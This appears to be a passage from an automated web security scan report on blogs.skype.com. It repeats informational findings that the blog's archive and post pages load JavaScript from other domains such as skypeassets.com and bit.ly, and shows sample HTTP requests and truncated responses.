<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.72. http://blogs.skype.com/en/2010/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/09/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:30 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 242894
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.73. http://blogs.skype.com/en/2010/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/10/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:29 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 485845
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.74. http://blogs.skype.com/en/2010/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/11/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:27 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 545285
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.75. http://blogs.skype.com/en/2010/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/12/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2010/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:25 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 414773
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.76. http://blogs.skype.com/en/2011/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/01/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:53 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 485169
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.77. http://blogs.skype.com/en/2011/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/02/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:51 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 128365
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.78. http://blogs.skype.com/en/2011/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/03/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:50 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 236737
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.79. http://blogs.skype.com/en/2011/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/04/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:49 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 200715
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.80. http://blogs.skype.com/en/2011/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/05/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 202770
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.81. http://blogs.skype.com/en/2011/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/06/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:46 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 163214
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.82. http://blogs.skype.com/en/2011/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/07/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 109054
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.83. http://blogs.skype.com/en/2011/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/08/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:44 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 156054
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.84. http://blogs.skype.com/en/2011/08/using_skype_from_your_home_phone.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/08/using_skype_from_your_home_phone.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/08/using_skype_from_your_home_phone.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 65611
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.85. http://blogs.skype.com/en/2011/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/09/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:42 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61636
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.86. http://blogs.skype.com/en/2011/09/introducing_skypesupport_on_tw.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/09/introducing_skypesupport_on_tw.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2011/09/introducing_skypesupport_on_tw.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61925
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
